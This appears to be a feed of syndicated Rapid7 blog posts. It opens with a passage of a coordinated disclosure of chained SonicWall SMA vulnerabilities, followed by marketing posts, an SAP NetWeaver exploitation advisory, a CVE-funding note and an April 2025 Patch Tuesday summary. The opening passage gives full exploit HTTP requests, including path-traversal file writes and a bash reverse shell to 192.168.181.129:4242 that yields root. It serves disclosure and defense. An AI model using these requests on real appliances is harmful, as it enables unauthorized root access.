2025/05/01 12:10:47 CMD: UID=99    PID=3243   | sh -c cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #/favicon.ico 2>/dev/null

As expected, the test.txt file has been written to the web root.

We also note that the uploaded file has the executable bit set by default.

# ls -lha /usr/src/EasyAccess/www/htdocs/test.txt
-rwx------ 1 nobody nobody 7 May  1 12:10 /usr/src/EasyAccess/www/htdocs/test.txt

This detail is useful for exploitation, since it will facilitate easily writing an executable file to a directory on the root PATH for arbitrary remote code execution.

Chained Impact

The vulnerabilities disclosed in this document permit an attacker with SMA SSLVPN low-privilege user credentials to perform the following five steps:

Exploit CVE-2025-32819 to delete the primary SQLite database and reset the password of the default SMA admin user.
Login as admin to the SMA web interface.
Exploit CVE-2025-32820 to make the SMA appliance’s /bin directory world-writable.
Exploit CVE-2025-32821 to write the file /bin/lsb_release. This executable is not installed by default, but we observed that an automated job on the appliance routinely attempts to execute it as root every few minutes.
Wait for sh -c lsb_release to be executed automatically. When this happens, the attacker gains root-level remote code execution on the SMA device.

Demonstration

We’ll start by grabbing our low-privilege user’s cookies in our “assumed breach” scenario. This cookie string is swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN.

Now, let’s reset the administrator’s password by exploiting CVE-2025-32819 and deleting the primary SQLite database. The SMA returns a 200 status with no body.

GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../usr/src/EasyAccess/var/conf/persist.db HTTP/1.1
Host: 192.168.181.150
Cookie: swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Refreshing the web page confirms it worked, though the application is not thrilled with our decision.

After a few seconds, the watchdog has had enough and the device is rebooted. When we refresh the page a couple of minutes later, things are looking as good as new.

After logging in using the credentials admin:password, we’re greeted with an end user product agreement, indicating that the device has been initialized.

We’ll input a free trial license key to get the device back in a functional state, though a real attacker would probably use a stolen one. Next, we’ll use our CVE-2025-32820 PoC to make /bin writable. The server should return a 500 error with the message “Failed to create description file.”

POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 181

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--

Lastly, we’ll set our sights on remote code execution as root by exploiting CVE-2025-32821. We throw the reverse shell PoC below at our victim and it responds with a 200 code and “success” in the body. Note that a hash symbol is also appended to our executable file contents; this is added because the file write occasionally seems to append a junk character to our command, though it doesn’t happen every time. In order to avoid any unexpected additions, we escape the rest of the line.

POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Content-Length: 567
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../bin/lsb_release #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

bash -i >& /dev/tcp/192.168.181.129/4242 0>&1 #
------WebKitFormBoundaryXOj6BtGNhEubdWvN--

One minute later, our reverse shell arrives and root-level remote code execution is confirmed.

Disclosure timeline

May 2, 2025: Rapid7 shares vulnerability details with SonicWall security contacts. The SonicWall team acknowledges the disclosure 30 minutes later and confirms that patch development work will begin.
May 4, 2025: The SonicWall security team states that a fixed build will be shared on May 5 for patch validation.
May 5, 2025: The SonicWall security team shares the 10.2.1.15 build with Rapid7. The Rapid7 team validates that the patch is effective.
May 6, 2025: The SonicWall security team states that the patch will be targeting a May 7 release date.
May 7, 2025: SonicWall releases v10.2.1.15 and publishes a security advisory. After confirming the patch is generally available, Rapid7 publishes this disclosure.

Exploring an Untethered, Unified Approach to CTEM

2025-05-07 Joel Alcon

Post Syndicated from Joel Alcon original https://blog.rapid7.com/2025/05/07/exploring-an-untethered-unified-approach-to-ctem/

Exploring an Untethered, Unified Approach to CTEM

We live in a world where traditional Vulnerability Management (VM) has become infosec’s version of ‘whack-a-mole’— an attempt to tackle risks that constantly shift, multiply, and morph. As organizations push workloads to the cloud, offer customers digital experiences, or as they build AI-enabled applications across their business, the attack surface expands exponentially. For decades, security teams have relied on traditional network and endpoint-based scanners to discover and patch CVEs, but the reality is attackers don’t think in terms of “CVEs”—they think in attack paths.

The most successful hackers increase the blast radius and impact of their attacks by connecting key dots across your organization:

Weak access controls to high-privilege users.
Misconfigurations to mission-critical assets.
Known exploits to number of impacted systems.

To tame this complicated, quickly-evolving threat landscape, security teams are moving from ticking boxes for vulnerabilities patched, to understanding, contextualizing, and preempting real-world threats before they become breaches. The strategic shift has fueled the rise of Risk-Based Vulnerability Management (RBVM) and Continuous Threat Exposure Management (CTEM).

However, many organizations implement these approaches through an array of point security solutions – vulnerability scanners, endpoint detection software, penetration testing – and feed this data into one or more aggregation tools (usually SIEMs). This fragmented approach has inadvertently paved the way for tool sprawl, operational silos, and security blind spots. In this blog, I’ll explore why RBVM and CTEM have become essential security strategies, common mistakes that organizations make in implementation, and why these shortcomings have fueled the demand for unified exposure management.

Navigating the peaks and plateaus of RBVM and CTEM

RBVM helps teams prioritize remediation based on exploitability, criticality, and threat intelligence, rather than relying solely on CVE severity scores. RBVM solutions typically ingest data from vulnerability scanners, external threat feeds, endpoint detection systems, and other security tools. Security analysts then correlate key findings against SIEM tools to determine which vulnerabilities are actively being exploited in their environment.

The key benefit? This approach reduces alert noise because it filters out low-risk vulnerabilities, enabling security teams to focus remediation efforts on the most critical threats.

However, RBVM approaches come with significant drawbacks:

RBVM tools are not designed to perform scans or produce threat intel themselves.
Teams must integrate RBVM solutions into their existing security stack (SIEM, SOAR, EDR, cloud security tools) – a process that’s often complex, time-consuming, and costly.
Most critically, if there are assets that the RVBM services have no visibility into, they will not produce risk scores for them, creating an incomplete picture of your attack surface and inaccurate representation of true business threats.

The evolution to CTEM

To continuously assess and validate exposures across the entire attack surface, organizations are turning to CTEM as a proactive strategy for mitigating ongoing risk. With real-time, continuous visibility into the attack surface and attack paths, security teams can prioritize remediation efforts based on the risks that impact business-critical systems. Despite the benefits of this more advanced approach, implementing CTEM with fragmented security tools creates significant challenges:

Misleading view of the attack surface.

Your security stack may have top-tier vulnerability scanners, EDR solutions, and CSPM tools, but if these tools aren’t talking to each other, you end up with an incomplete view of the attack paths that hackers would take. Leading CTEM approaches are underpinned by platforms that go beyond CVEs by incorporating misconfigurations, cloud entitlements, shadow IT, lateral movement risks, and application security gaps to provide a comprehensive view of the attack surface.

Lacking business content and impact analysis for prioritization.

Security teams have to sort through alerts, false positives, and vulnerability scan results that often lack business context. Without a unified platform connecting vulnerability findings with risk scores and business impact, teams will struggle to accurately prioritize risk, leaving them spending valuable time remediating issues that do not actually impact business-critical systems. Organizations need to look across the entire attack surface, including internal and external-facing attack vectors, as well as telemetry signals like weak identity and access controls.

Silos hinder incident response.

Vulnerability dashboards and reports do not depict how an adversary would exploit a vulnerability. Organizations need an in-depth view of the attack path to understand, for example, how misconfigurations can result in disruptive domain compromise in the event of a breach. This insight helps security teams identify interconnected systems and organizational peers (e.g., application owners, cloud architects, developers, engineers, etc.) that they will need to coordinate with in case there is a breach.

The driving force for a unified exposure management platform

According to the 2023 Gartner® Technology Adoption Roadmap for Large Enterprises Survey, cybersecurity leaders indicated that on average their organizations had 43 tools in their cybersecurity product portfolios, and 5% of the leaders indicated their organizations had over 100 tools.” We believe that managing that many tools can be overwhelming, especially because security teams often operate their tools in silos. The ensuing sprawl creates blind spots that attackers can easily exploit. Instead of juggling multiple disconnected tools, forward-thinking organizations are embracing a unified approach to exposure management with comprehensive platforms that deliver:

Vulnerability management
CASM
EASM
Cloud security
Identity security
Threat intelligence

Because many high-profile breaches start with compromised credentials or excessive privileges, the ideal exposure management platform maps critical assets against users with weak authentication protocols.

Security teams can no longer rely on a scan-and-patch approach; they need to stay ahead of attackers by continuously identifying, validating, and mitigating risks across the entire attack surface. If your security tools aren’t fully integrated, attackers will exploit what’s left exposed. CISOs, security architects, and SOC leaders are tackling this challenge by moving beyond traditional VM and adopting a unified exposure management strategy with Rapid7’s Exposure Command Platform.

Connecting the dots with Exposure Command

Unlike traditional standalone VM, CASM, EASM, SIEM, or EDR tools that rely on proprietary agents, Exposure Command from Rapid7 brings it all together into one platform. With an inside-out and outside-in view of your risks, combined with trusted threat intelligence and a vendor agnostic approach to vulnerability aggregation, security teams gain a complete, end-to-end view of their attack surface.

Rapid7’s all-in-one Exposure Command platform goes even further by automatically mapping users, authentication protocols, and the criticality of the systems they can access. Armed with deep visibility into vulnerabilities and their impact to the business, organizations can leverage Rapid7’s Remediation Hub to address the risks that have the largest impact on their overall risk posture.

The paradigm has shifted – it’s no longer about chasing vulnerability patches, but about taking command and reducing risk across the business.

Ready to see the difference a unified approach can make? Check out the Rapid7 Exposure Command product trial to learn more about our platform and dive deeper into our unified, modern approach to managing risk and remediating security threats.

Gartner, Infrastructure Security Primer for 2025, John Watts, Franz Hinner, 29 January 2025 (For Gartner subscribers only)

Three Takeaways from the Gartner® Report: How to Grow Vulnerability Management Into Exposure Management

2025-04-30 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/04/30/three-takeaways-from-the-gartner-r-report-how-to-grow-vulnerability-management-into-exposure-management/

Three Takeaways from the Gartner® Report: How to Grow Vulnerability Management Into Exposure Management

Security leaders today face a harsh reality: traditional vulnerability management isn’t enough. Threat actors are evolving, attack surfaces are expanding, and organizations need a more proactive approach to stay ahead of risk. Latest research from Gartner, How to Grow Vulnerability Management Into Exposure Management, highlights the need for security teams to move beyond simply tracking vulnerabilities and embrace a more comprehensive approach to exposure management.

At Rapid7, we are excited to offer complimentary access to this report and share our three key takeaways to help you modernize your security strategy.

Takeaway 1: Vulnerability Lists Aren’t Enough—You Need Continuous Threat Exposure Management (CTEM)

Gartner states: “Creating prioritized lists of security vulnerabilities isn’t enough to cover all exposures or find actionable solutions. Security operations managers should go beyond vulnerability management and build a continuous threat exposure management program to more effectively scope and remediate exposures.”

CTEM shifts the focus from merely identifying vulnerabilities to understanding the full picture of organizational risk. It integrates asset visibility, business impact analysis, attack surface monitoring, and validation of security controls to help organizations assess and reduce their true exposure to threats.

Takeaway 2: Exposure Management Requires Business Context

One of the biggest challenges in vulnerability management today is that many security teams focus too much on discovering issues without evaluating their impact on the business. Gartner highlights the importance of integrating business context into security operations, stating that “adding a business context, such as asset value and impact of compromise, to exposure management activities can improve senior leadership engagement.”

By aligning security initiatives with business priorities, organizations can:

Focus on the vulnerabilities that pose the greatest risk to critical operations
Improve communication with senior leadership and stakeholders
Justify security investments with real business impact

Takeaway 3: Attack Surface Visibility Must Keep Up With Digital Evolution

Modern attack surfaces extend far beyond on-premises IT. The rise of cloud applications, IoT, supply chain dependencies, and remote work environments has dramatically increased the number of potential entry points for attackers. Gartner emphasizes that “current approaches to attack surface visibility are not keeping up with the rapid pace of digital evolution. Organizations must quickly reduce exposure to make their public-facing assets less visible and accessible.”

This means security teams need to enhance their discovery processes to:

Continuously monitor both their internal and external attack surface
Identify misconfigurations, exposed assets, emerging threats, and weak access controls (e.g., credentials, risky users)
Implement proactive security measures to reduce overall exposure

How Rapid7 Aligns with Gartner Exposure Management Vision

At Rapid7, we believe in empowering security teams with the tools and insights they need to shift from reactive vulnerability management to proactive exposure management. Our Exposure Management solution helps organizations:

Gain real-time visibility into evolving attack surfaces
Prioritize threats based on business impact and exploitability
Continuously validate security controls through adversarial exposure testing

As threats continue to evolve, organizations must rethink how they approach vulnerability management. Gartner research provides a roadmap for security leaders looking to implement a comprehensive exposure management strategy.

Download the full Gartner report today to learn how you can modernize your security program and stay ahead of threats.

Garter, How to Grow Vulnerability Management Into Exposure Management, Michell Schneider, Jeremy D’Hoinne, Jonathan Nunez, Craig Lawson, 8 November 2024

Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324

2025-04-28 Caitlin Condon

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/

Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324

On Thursday, April 24, enterprise resource planning company SAP published a CVE (and a day later, an advisory behind login) for CVE-2025-31324, a zero-day vulnerability in NetWeaver Visual Composer that carries a CVSSv3 score of 10. The vulnerability arises from a missing authorization check in Visual Composer’s Metadata Uploader component that, when successfully exploited, allows unauthenticated attackers to send specially crafted POST requests to the /developmentserver/metadatauploader endpoint, resulting in unrestricted malicious file upload.

While the vulnerable component is not installed in NetWeaver’s default configuration, SAP security firm Onapsis notes that it is widely enabled.

Per SAP’s docs, Visual Composer “operates on top of the SAP NetWeaver Portal, utilizing the portal’s connector-framework interfaces to enable access to a range of data services, including SAP and third-party enterprise systems. In addition to accessing SAP Business Suite systems, users can access SAP NetWeaver Business Warehouse and any open/JDBC stored procedures.”

Rapid7-observed exploitation

CVE-2025-31324 is being actively exploited in the wild; Rapid7 MDR has observed exploitation in multiple customer environments dating back to at least March 27, 2025, nearly all of which has targeted manufacturing companies. Adversaries have exploited the vulnerability to drop webshells in the following directory: j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/

Public threat intelligence on CVE-2025-31324 exploitation has highlighted the use of webshells named helper.jsp and cache.jsp. With few exceptions (like helper.jsp), most webshells Rapid7 has observed had random 8-character names, e.g.:
cglswdjp.jsp
ijoatvey.jsp
dkqgcoxe.jsp
ylgxcsem.jsp
cpyjljgo.jsp
tgmzqnty.jsp

Rapid7 has not attributed this activity to a specific threat actor at time of writing.

Mitigation guidance

All SAP NetWeaver 7.xx versions and service packs (SPS) are affected.

SAP’s non-public guidance indicates that customers can check system info (http://host:port/nwa/sysinfo) for the Software Component VISUAL COMPOSER FRAMEWORK (VCFRAMEWORK.SCA). If this check returns no results, SAP has said the vulnerability is “not relevant for that system.”

Customers should update to the latest version of NetWeaver AS on an emergency basis, without waiting for a regular patch cycle to occur. Note that updating to a fixed version of NetWeaver will not address pre-existing compromises. Customers who are unable to update to a fixed version of the application should disable Visual Composer by following SAP’s directions here.

Customers should also restrict access to the affected endpoint (/developmentserver/metadatauploader) and investigate their environments for signs of compromise. SAP’s non-public advisory notes that the “most common targets for an attacking agent” are the following paths under the JAVA server file system — jsp, java, or class files present directly in these paths should be considered malicious: C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

For additional information and the latest guidance, please refer to SAP’s non-public materials or contact SAP support.

Rapid7 customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage.

For InsightVM and Nexpose customers, our vulnerability coverage engineering team is investigating options to help customers assess exposure to this threat. We will update this blog no later than 3 PM ET on Monday, April 28 with additional information and delivery timelines.

Following the News: MITRE’s Common Vulnerabilities and Exposures (CVE) Funding

2025-04-16 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/04/16/following-the-news-mitres-common-vulnerabilities-and-exposures-cve-funding/

The current situation

Following the News: MITRE’s Common Vulnerabilities and Exposures (CVE) Funding

On April 16, CISA extended funding to ensure no continuity issues with the critical Common Vulnerabilities and Exposures (CVE) program. This was in response to a letter sent by MITRE on April 15 to CVE board members warning of a potential issue with MITRE’s support for the CVE program. MITRE administers the global CVE program, which provides the human and technological infrastructure to reserve, publish, modify, and dispute CVEs.

Rapid7 continues to monitor both public and private discussions closely in its capacity as a CVE Numbering Authority (CNA) and as a longtime leader and participant in the CVE ecosystem.

How this could impact Rapid7 and our customers

Since funding has been extended for the next 11 months, there is no current impact. Rapid7 will continue to monitor the situation to ensure there is no future impact to our customers’ ability to use our platform to accurately assess their environment for vulnerabilities.

Rapid7’s multi-layered approach to vulnerability detection, creation, and risk scoring means that our products are not completely reliant on any single source of information. This was something we pointed to last year, when we assured customers of our continued vulnerability coverage in the face of NIST’s National Vulnerability Database delays.

The importance of MITRE and the CVE Program

The CVE program is critical infrastructure for modern vulnerability identification, tracking, management, and resolution. CVEs are used for risk identification, commercial and open-source tooling, vulnerability management workflows, security and academic research, threat intel production, incident response, and many other applications worldwide.

Rapid7 thanks and supports the MITRE organization as well as the extended ecosystem of industry collaborators who have worked diligently for the past 25 years to ensure the CVE program’s utility and integrity for the broader community.

We will continue to monitor the situation and will update this blog with any relevant developments. If you have any questions, please reach out.

Patch Tuesday – April 2025

2025-04-08 Adam Barnett

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/04/08/patch-tuesday-april-2025/

Patch Tuesday - April 2025

Microsoft is addressing 121 vulnerabilities this April 2025 Patch Tuesday, which is more than twice as many as last month. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, which is already reflected in CISA KEV. Once again, Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication, so that’s now a seven month unbroken streak. Today also sees the publication of 11 critical remote code execution (RCE) vulnerabilities. 13 browser vulnerabilities have already been published separately this month, and are not included in the total.

CLFS: zero-day EoP

The Windows Common Log File System (CLFS) Driver is firmly back on our radar today with CVE-2025-29824, a zero-day local elevation of privilege vulnerability. First, the good news: the Acknowledgements section credits the Microsoft Threat Intelligence Center, so the exploit was successfully reproduced by Microsoft; the less-good news is that someone other than Microsoft was first to discover the exploit, because otherwise Microsoft wouldn’t be listing CVE-2025-29824 as exploited in the wild. The advisory does not specify what privilege level is achieved upon successful exploitation, but it’ll be SYSTEM, because that’s the prize for all the other CLFS elevation of privilege zero-day vulnerabilities. As usual, some form of less-privileged local access is a pre-requisite, but attack complexity is low, so this is the sort of vulnerability which goes into any standard break-and-enter toolkit. Given the long history of similar vulnerabilities, it would be more surprising if exploit code wasn’t publicly available in the not-too-distant future. Although December 2024 Patch Tuesday seems as though it must have been a very long time ago, any standard calendar will tell us that only 119 days have elapsed since the last zero-day CLFS local elevation of privilege. Rapid7 discussed the history of CLFS zero-day elevation of privilege vulnerabilities at the time. All versions of Windows receive a patch, except for the venerable LTSC Windows 10 1507, which is listed on the advisory as vulnerable, but left out in the cold with no update; the FAQ says to check back later. Windows 10 LTSC 1507 is scheduled for end of servicing on 2025-10-14, so the clock is ticking regardless.

LDAP Server: critical RCE

Although it has been many months since we’ve seen a critical zero-day vulnerability from Microsoft, there is no shortage of critical remote code execution (RCE) vulnerabilities published today. Defenders responsible for an LDAP server — which means almost any organization with a non-trivial Microsoft footprint — should add patching for CVE-2025-26663 to their to-do list. With no privileges required, no need for user interaction, and code execution presumably in the context of the LDAP server itself, successful exploitation would be an attractive shortcut to any attacker. Anyone wondering if today is a re-run of December 2024 Patch Tuesday can take some small solace in the fact that the worst of the trio of LDAP critical RCEs published at the end of last year was likely easier to exploit than today’s example, since today’s CVE-2025-26663 requires that an attacker win a race condition. Despite that, Microsoft still expects that exploitation is more likely.

LDAP Client: critical RCE

If you breathe a sigh of relief when you see LDAP server critical RCE vulnerabilities like CVE-2025-26663, because you’re certain that you don’t have any Windows LDAP servers in your estate, how about LDAP clients? CVE-2025-26670 describes a critical RCE in the LDAP client, although the FAQ confusingly states that exploitation would require an attacker to “send specially crafted requests to a vulnerable LDAP server”; this seems like it might be a data entry error on the advisory FAQ, so keep an eye out for an update to that section of the advisory. Assuming the rest of the advisory is all present and correct, exploitation requires that the attacker win a race condition, which keeps the attack complexity higher than it otherwise would be. While we wait for clarification, it’s still a critical RCE which Microsoft rates as “exploitation more likely”. On that basis, patching is always recommended.

RDS: critical RCEs

The prolific Windows vulnerability pioneers at Kunlun Lab are credited with a pair of critical RCE vulnerabilities in Windows Remote Desktop Services. Although both CVE-2025-27480 and CVE-2025-27482 share a CVSSv3 base score of 8.1, Microsoft has ranked them both as critical using its own proprietary severity ranking scale. Both vulnerabilities require that an attacker win a race condition. If you’ve ever read Microsoft’s guide to deploying the Remote Desktop Gateway role, you probably have some systems to patch.

Hyper-V: critical RCE

Some Microsoft security advisory FAQs provide a satisfying level of detail, whereas others raise more questions than they answer. CVE-2025-27491 is a Hyper-V critical RCE which falls into the second category, since it states that an attacker must be authenticated — no need for elevated privileges — but also that the attacker must send the user a malicious site and convince them to open it, and it’s not at all clear why authentication would be required in that case. Also unusual: the remediation table on the advisory lists several 32-bit versions of Windows as receiving patches, although Hyper-V requires a 64-bit processor and a 64-bit host OS.

Microsoft lifecycle update

In Microsoft product lifecycle news, Dynamics GP 2015 moves past the end of extended support today. The next batch of significant lifecycle status changes are due in July 2025, when SQL Server 2012 ESU program draws to a close.

Summary charts

Summary tables

Apps vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29805	Outlook for Android Information Disclosure Vulnerability	No	No	7.5

Azure vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-27489	Azure Local Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26628	Azure Local Cluster Information Disclosure Vulnerability	No	No	7.3
CVE-2025-25002	Azure Local Cluster Information Disclosure Vulnerability	No	No	6.8

Browser vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-25000	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-29815	Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability	No	No	7.6
CVE-2025-29796	Microsoft Edge for iOS Spoofing Vulnerability	No	No	4.7
CVE-2025-25001	Microsoft Edge for iOS Spoofing Vulnerability	No	No	4.3
CVE-2025-3074	Chromium: CVE-2025-3074 Inappropriate implementation in Downloads	No	No	N/A
CVE-2025-3073	Chromium: CVE-2025-3073 Inappropriate implementation in Autofill	No	No	N/A
CVE-2025-3072	Chromium: CVE-2025-3072 Inappropriate implementation in Custom Tabs	No	No	N/A
CVE-2025-3071	Chromium: CVE-2025-3071 Inappropriate implementation in Navigations	No	No	N/A
CVE-2025-3070	Chromium: CVE-2025-3070 Insufficient validation of untrusted input in Extensions	No	No	N/A
CVE-2025-3069	Chromium: CVE-2025-3069 Inappropriate implementation in Extensions	No	No	N/A
CVE-2025-3068	Chromium: CVE-2025-3068 Inappropriate implementation in Intents	No	No	N/A
CVE-2025-3067	Chromium: CVE-2025-3067 Inappropriate implementation in Custom Tabs	No	No	N/A
CVE-2025-3066	Chromium: CVE-2025-3066 Use after free in Navigations	No	No	N/A

Developer Tools vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-26682	ASP.NET Core and Visual Studio Denial of Service Vulnerability	No	No	7.5
CVE-2025-29802	Visual Studio Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-29804	Visual Studio Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-20570	Visual Studio Code Elevation of Privilege Vulnerability	No	No	6.8

Developer Tools SQL Server vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29803	Visual Studio Tools for Applications and SQL Server Management Studio Elevation of Privilege Vulnerability	No	No	7.3

Microsoft Dynamics vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29821	Microsoft Dynamics Business Central Information Disclosure Vulnerability	No	No	5.5

Microsoft Office vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-29794	Microsoft SharePoint Remote Code Execution Vulnerability	No	No	8.8
CVE-2025-27747	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29820	Microsoft Word Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29822	Microsoft OneNote Security Feature Bypass Vulnerability	No	No	7.8
CVE-2025-27745	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27748	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27749	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27746	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-26642	Microsoft Office Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27744	Microsoft Office Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27752	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29791	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27751	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27750	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29823	Microsoft Excel Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29800	Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29801	Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-29816	Microsoft Word Security Feature Bypass Vulnerability	No	No	7.5
CVE-2025-29792	Microsoft Office Elevation of Privilege Vulnerability	No	No	7.3
CVE-2025-29793	Microsoft SharePoint Remote Code Execution Vulnerability	No	No	7.2

System Center vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-27743	Microsoft System Center Elevation of Privilege Vulnerability	No	No	7.8

Windows vulnerabilities

CVE	Title	Exploited?	Publicly disclosed?	CVSSv3 base score
CVE-2025-26678	Windows Defender Application Control Security Feature Bypass Vulnerability	No	No	8.4
CVE-2025-27482	Windows Remote Desktop Services Remote Code Execution Vulnerability	No	No	8.1
CVE-2025-26639	Windows USB Print Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26675	Windows Subsystem for Linux Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27729	Windows Shell Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-29811	Windows Mobile Broadband Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-26666	Windows Media Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-26674	Windows Media Remote Code Execution Vulnerability	No	No	7.8
CVE-2025-27728	Windows Kernel-Mode Driver Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27739	Windows Kernel Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27476	Windows Digital Media Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27467	Windows Digital Media Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27730	Windows Digital Media Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-24058	Windows DWM Core Library Elevation of Privilege Vulnerability	No	No	7.8
CVE-2025-27490	Windows Bluetooth Service Elevation of Privilege Vulnerability	No	No	7.8
